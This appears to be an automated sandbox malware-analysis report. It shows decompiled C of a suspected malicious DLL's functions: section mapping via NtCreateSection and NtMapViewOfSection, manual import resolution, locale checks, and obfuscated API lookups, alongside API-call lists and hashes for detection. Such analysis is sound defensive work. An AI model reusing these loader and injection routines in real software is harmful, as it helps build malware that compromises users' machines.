                                                                                                                                                                              0x66db1947
                                                                                                                                                                              0x66db1965
                                                                                                                                                                              0x66db1949
                                                                                                                                                                              0x66db1950
                                                                                                                                                                              0x66db195e
                                                                                                                                                                              0x66db195e
                                                                                                                                                                              0x66db1947
                                                                                                                                                                              0x66db1976

                                                                                                                                                                              APIs
                                                                                                                                                                              • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 66DB192E
                                                                                                                                                                                • Part of subcall function 66DB1B89: NtMapViewOfSection.NTDLL(00000000,000000FF,66DB1943,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,66DB1943,?), ref: 66DB1BB6
                                                                                                                                                                              • memset.NTDLL ref: 66DB1950
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Section$CreateViewmemset
                                                                                                                                                                              • String ID: @
                                                                                                                                                                              • API String ID: 2533685722-2766056989
                                                                                                                                                                              • Opcode ID: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
                                                                                                                                                                              • Instruction ID: b84a3484c6147c0ab3ee0ddd7363a3ba624f630d50b7d2ce68a68a48aae07eb9
                                                                                                                                                                              • Opcode Fuzzy Hash: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A211DB1D00209AFDB01CFA9CC849DEFBF9EF48354F108529E556F3210D730AA448BA4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB1566, Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                              			E66DB1566(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}





                                                                                                                                                                              0x66db156a
                                                                                                                                                                              0x66db157b
                                                                                                                                                                              0x66db1583
                                                                                                                                                                              0x66db1585
                                                                                                                                                                              0x66db1598
                                                                                                                                                                              0x66db1598
                                                                                                                                                                              0x66db15a2

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,66DB1C5E,?,66DB1810,?,00000000,00000000,?,?,?,66DB1810), ref: 66DB157B
                                                                                                                                                                              • GetSystemDefaultUILanguage.KERNEL32(?,?,66DB1C5E,?,66DB1810,?,00000000,00000000,?,?,?,66DB1810), ref: 66DB1585
                                                                                                                                                                              • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,66DB1C5E,?,66DB1810,?,00000000,00000000,?,?,?,66DB1810), ref: 66DB1598
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Language$DefaultInfoLocaleNameSystem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3724080410-0
                                                                                                                                                                              • Opcode ID: 6a6957d46f8ce653dd9238f566f16b2a82db7e634105b97ccbecba025e03e30a
                                                                                                                                                                              • Instruction ID: fef903b80051fdb0851fdbe253e54554ab1ccbb54d58fa7b52b24f9c3315c204
                                                                                                                                                                              • Opcode Fuzzy Hash: 6a6957d46f8ce653dd9238f566f16b2a82db7e634105b97ccbecba025e03e30a
                                                                                                                                                                              • Instruction Fuzzy Hash: 13E048E4640204F7E710DB919C06F7D72B89B4074AF500054F701D60C4D6749E04A775
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB1F31, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E66DB1F31(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x66db41cc;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                                                                                                                                                                              0x66db1f31
                                                                                                                                                                              0x66db1f3a
                                                                                                                                                                              0x66db1f3f
                                                                                                                                                                              0x66db1f45
                                                                                                                                                                              0x66db1f4e
                                                                                                                                                                              0x66db1f54
                                                                                                                                                                              0x66db1f56
                                                                                                                                                                              0x66db1f59
                                                                                                                                                                              0x66db1f5e
                                                                                                                                                                              0x66db1f65
                                                                                                                                                                              0x66db1f65
                                                                                                                                                                              0x66db1f69
                                                                                                                                                                              0x66db1f71
                                                                                                                                                                              0x66db1f74
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1f7a
                                                                                                                                                                              0x66db1f84
                                                                                                                                                                              0x66db1f86
                                                                                                                                                                              0x66db1f89
                                                                                                                                                                              0x66db1f8c
                                                                                                                                                                              0x66db1f90
                                                                                                                                                                              0x66db1f98
                                                                                                                                                                              0x66db1f9a
                                                                                                                                                                              0x66db1f9d
                                                                                                                                                                              0x66db2005
                                                                                                                                                                              0x66db2005
                                                                                                                                                                              0x66db2009
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1fa2
                                                                                                                                                                              0x66db1fa8
                                                                                                                                                                              0x66db1faa
                                                                                                                                                                              0x66db1fbd
                                                                                                                                                                              0x66db1fc0
                                                                                                                                                                              0x66db1fc0
                                                                                                                                                                              0x66db1fc0
                                                                                                                                                                              0x66db1fc4
                                                                                                                                                                              0x66db1fac
                                                                                                                                                                              0x66db1fac
                                                                                                                                                                              0x66db1fb4
                                                                                                                                                                              0x66db1fb6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1fb6
                                                                                                                                                                              0x66db1fa4
                                                                                                                                                                              0x66db1fa4
                                                                                                                                                                              0x66db1fb8
                                                                                                                                                                              0x66db1fb8
                                                                                                                                                                              0x66db1fb8
                                                                                                                                                                              0x66db1fc7
                                                                                                                                                                              0x66db1fca
                                                                                                                                                                              0x66db1fcc
                                                                                                                                                                              0x66db1fd3
                                                                                                                                                                              0x66db1fce
                                                                                                                                                                              0x66db1fce
                                                                                                                                                                              0x66db1fce
                                                                                                                                                                              0x66db1fdb
                                                                                                                                                                              0x66db1fe1
                                                                                                                                                                              0x66db1fe3
                                                                                                                                                                              0x66db2013
                                                                                                                                                                              0x66db1fe5
                                                                                                                                                                              0x66db1fe5
                                                                                                                                                                              0x66db1fe8
                                                                                                                                                                              0x66db1fea
                                                                                                                                                                              0x66db1ff2
                                                                                                                                                                              0x66db1ff2
                                                                                                                                                                              0x66db1ff7
                                                                                                                                                                              0x66db1ff9
                                                                                                                                                                              0x66db2000
                                                                                                                                                                              0x66db2002
                                                                                                                                                                              0x66db2002
                                                                                                                                                                              0x66db2002
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2002
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1fe3
                                                                                                                                                                              0x66db1f92
                                                                                                                                                                              0x66db1f94
                                                                                                                                                                              0x66db1f96
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1f96
                                                                                                                                                                              0x66db2016
                                                                                                                                                                              0x66db2016
                                                                                                                                                                              0x66db201d
                                                                                                                                                                              0x66db2022
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2028
                                                                                                                                                                              0x66db2033
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2033
                                                                                                                                                                              0x66db202a
                                                                                                                                                                              0x66db202a
                                                                                                                                                                              0x66db2030
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db2030
                                                                                                                                                                              0x66db1f5e
                                                                                                                                                                              0x66db2034
                                                                                                                                                                              0x66db2039

                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 66DB1F69
                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 66DB1FDB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2574300362-0
                                                                                                                                                                              • Opcode ID: 1b32ab2c4c8680839e4e582ddbdfd8c3eecae11c8f775f3576a4e1d66e67b82e
                                                                                                                                                                              • Instruction ID: 4d6a5412be8b7c7022c8a52b0b1b497b5b559fe803879d343d6632ef1d3b025c
                                                                                                                                                                              • Opcode Fuzzy Hash: 1b32ab2c4c8680839e4e582ddbdfd8c3eecae11c8f775f3576a4e1d66e67b82e
                                                                                                                                                                              • Instruction Fuzzy Hash: E8313BB2E0020ADFEB14CF5ACC80AAEB7F5BF59349F104169D952E7248E774DA40CB91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB1B89, Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                              			E66DB1B89(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                                                                                                                                                              0x66db1b9b
                                                                                                                                                                              0x66db1ba1
                                                                                                                                                                              0x66db1baf
                                                                                                                                                                              0x66db1bb6
                                                                                                                                                                              0x66db1bbb
                                                                                                                                                                              0x66db1bc1
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1bc2
                                                                                                                                                                              0x00000000

                                                                                                                                                                              APIs
                                                                                                                                                                              • NtMapViewOfSection.NTDLL(00000000,000000FF,66DB1943,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,66DB1943,?), ref: 66DB1BB6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: SectionView
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1323581903-0
                                                                                                                                                                              • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                              • Instruction ID: 6bf0f2845e84d0463048e27ef8be8eb30716991a4f1598927dd82ac4bf3a7aed
                                                                                                                                                                              • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                              • Instruction Fuzzy Hash: 46F01CB690020CFFEB119FA5CC89C9FBBFDEB45394B104939B552E1194E6309E089B60
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB17A7, Relevance: 15.1, APIs: 10, Instructions: 103threadsleepsynchronizationCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                                              			E66DB17A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E66DB146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E66DB15A3(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E66DB1C12(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E66DB1CA4(E66DB16EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E66DB1D7C(_t45,  &_v48) != 0) {
					 *0x66db41b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x66db41b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E66DB1C8F(_t50 + _t15);
				 *0x66db41b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E66DB136A(_t44);
					goto L11;
				}
			}






















                                                                                                                                                                              0x66db17b3
                                                                                                                                                                              0x66db17bc
                                                                                                                                                                              0x66db17c0
                                                                                                                                                                              0x66db18c8
                                                                                                                                                                              0x66db18ce
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db17c6
                                                                                                                                                                              0x66db17c6
                                                                                                                                                                              0x66db17cb
                                                                                                                                                                              0x66db17d1
                                                                                                                                                                              0x66db17e0
                                                                                                                                                                              0x66db17e1
                                                                                                                                                                              0x66db17e4
                                                                                                                                                                              0x66db17e7
                                                                                                                                                                              0x66db17f0
                                                                                                                                                                              0x66db17f4
                                                                                                                                                                              0x66db17fa
                                                                                                                                                                              0x66db17fe
                                                                                                                                                                              0x66db1805
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db180b
                                                                                                                                                                              0x66db1812
                                                                                                                                                                              0x66db1816
                                                                                                                                                                              0x66db18b9
                                                                                                                                                                              0x66db18b9
                                                                                                                                                                              0x66db18c0
                                                                                                                                                                              0x66db18c2
                                                                                                                                                                              0x66db18c2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db18c0
                                                                                                                                                                              0x66db181f
                                                                                                                                                                              0x66db1872
                                                                                                                                                                              0x66db1872
                                                                                                                                                                              0x66db1883
                                                                                                                                                                              0x66db1887
                                                                                                                                                                              0x66db18b5
                                                                                                                                                                              0x66db1889
                                                                                                                                                                              0x66db188c
                                                                                                                                                                              0x66db1894
                                                                                                                                                                              0x66db1898
                                                                                                                                                                              0x66db18a0
                                                                                                                                                                              0x66db18a0
                                                                                                                                                                              0x66db18a7
                                                                                                                                                                              0x66db18a7
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1887
                                                                                                                                                                              0x66db182d
                                                                                                                                                                              0x66db186c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db186c
                                                                                                                                                                              0x66db182f
                                                                                                                                                                              0x66db1833
                                                                                                                                                                              0x66db183c
                                                                                                                                                                              0x66db183e
                                                                                                                                                                              0x66db1842
                                                                                                                                                                              0x66db1864
                                                                                                                                                                              0x66db1864
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1864
                                                                                                                                                                              0x66db1844
                                                                                                                                                                              0x66db1849
                                                                                                                                                                              0x66db1850
                                                                                                                                                                              0x66db1855
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1857
                                                                                                                                                                              0x66db185a
                                                                                                                                                                              0x66db185d
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db185d

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 66DB146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,66DB17B8,73B763F0,00000000), ref: 66DB147B
                                                                                                                                                                                • Part of subcall function 66DB146C: GetVersion.KERNEL32 ref: 66DB148A
                                                                                                                                                                                • Part of subcall function 66DB146C: GetCurrentProcessId.KERNEL32 ref: 66DB1499
                                                                                                                                                                                • Part of subcall function 66DB146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 66DB14B2
                                                                                                                                                                              • GetSystemTime.KERNEL32(?,73B763F0,00000000), ref: 66DB17CB
                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 66DB17D1
                                                                                                                                                                                • Part of subcall function 66DB15A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 66DB15F9
                                                                                                                                                                                • Part of subcall function 66DB15A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,66DB17EC), ref: 66DB168B
                                                                                                                                                                                • Part of subcall function 66DB15A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 66DB16A6
                                                                                                                                                                              • Sleep.KERNELBASE(00000000,00000000), ref: 66DB17F4
                                                                                                                                                                              • GetLongPathNameW.KERNELBASE ref: 66DB183C
                                                                                                                                                                              • GetLongPathNameW.KERNELBASE ref: 66DB185A
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,66DB16EC,?,00000000), ref: 66DB188C
                                                                                                                                                                              • GetExitCodeThread.KERNEL32(00000000,?), ref: 66DB18A0
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 66DB18A7
                                                                                                                                                                              • GetLastError.KERNEL32(66DB16EC,?,00000000), ref: 66DB18AF
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 66DB18C2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000001.00000002.1014684015.0000000066DB1000.00000020.00020000.sdmp, Offset: 66DB0000, based on PE: true
                                                                                                                                                                              • Associated: 00000001.00000002.1014676007.0000000066DB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014691870.0000000066DB3000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014699312.0000000066DB5000.00000004.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000001.00000002.1014708057.0000000066DB6000.00000002.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2280543912-0
                                                                                                                                                                              • Opcode ID: f433959e39203ec25b676f9588d1735670a8bfb78e2e19195bb882e30b644e36
                                                                                                                                                                              • Instruction ID: 14cdf2cfbf8087e2f16d89b8125cd3cd34f8b1ca9ead18c56269662bd79923a6
                                                                                                                                                                              • Opcode Fuzzy Hash: f433959e39203ec25b676f9588d1735670a8bfb78e2e19195bb882e30b644e36
                                                                                                                                                                              • Instruction Fuzzy Hash: 49315EF5C04721EBE710DF668C4495F7BEDFEC6655B110A2AF566C214CEB30C9049AB2
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 66DB1AA5, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E66DB1AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E66DB1C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x66db41d0 + 0x66db5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x66db41d0 + 0x66db50e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E66DB136A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x66db41d0 + 0x66db50f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x66db41d0 + 0x66db5104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x66db41d0 + 0x66db5119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x66db41d0 + 0x66db512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E66DB18D1(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                                                              0x66db1ab3
                                                                                                                                                                              0x66db1ab7
                                                                                                                                                                              0x66db1b78
                                                                                                                                                                              0x66db1abd
                                                                                                                                                                              0x66db1ad5
                                                                                                                                                                              0x66db1ae4
                                                                                                                                                                              0x66db1aeb
                                                                                                                                                                              0x66db1aef
                                                                                                                                                                              0x66db1af2
                                                                                                                                                                              0x66db1b70
                                                                                                                                                                              0x66db1b71
                                                                                                                                                                              0x66db1af4
                                                                                                                                                                              0x66db1b01
                                                                                                                                                                              0x66db1b05
                                                                                                                                                                              0x66db1b08
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1b0a
                                                                                                                                                                              0x66db1b17
                                                                                                                                                                              0x66db1b1b
                                                                                                                                                                              0x66db1b1e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1b20
                                                                                                                                                                              0x66db1b2d
                                                                                                                                                                              0x66db1b31
                                                                                                                                                                              0x66db1b34
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1b36
                                                                                                                                                                              0x66db1b43
                                                                                                                                                                              0x66db1b47
                                                                                                                                                                              0x66db1b4a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1b4c
                                                                                                                                                                              0x66db1b52
                                                                                                                                                                              0x66db1b58
                                                                                                                                                                              0x66db1b5d
                                                                                                                                                                              0x66db1b64
                                                                                                                                                                              0x66db1b67
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x66db1b69
                                                                                                                                                                              0x66db1b6c
                                                                                                                                                                              0x66db1b6c
                                                                                                                                                                              0x66db1b67
                                                                                                                                                                              0x66db1b4a
                                                                                                                                                                              0x66db1b34
                                                                                                                                                                              0x66db1b1e
                                                                                                                                                                              0x66db1b08
                                                                                                                                                                              0x66db1af2
                                                                                                                                                                              0x66db1b86

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 66DB1C8F: HeapAlloc.KERNEL32(00000000,?,66DB117D,?,00000000,00000000,?,?,?,66DB1810), ref: 66DB1C9B
                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1AC9
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1AEB
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B01
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B17
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B2D
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,66DB1272,?,?,?,?), ref: 66DB1B43
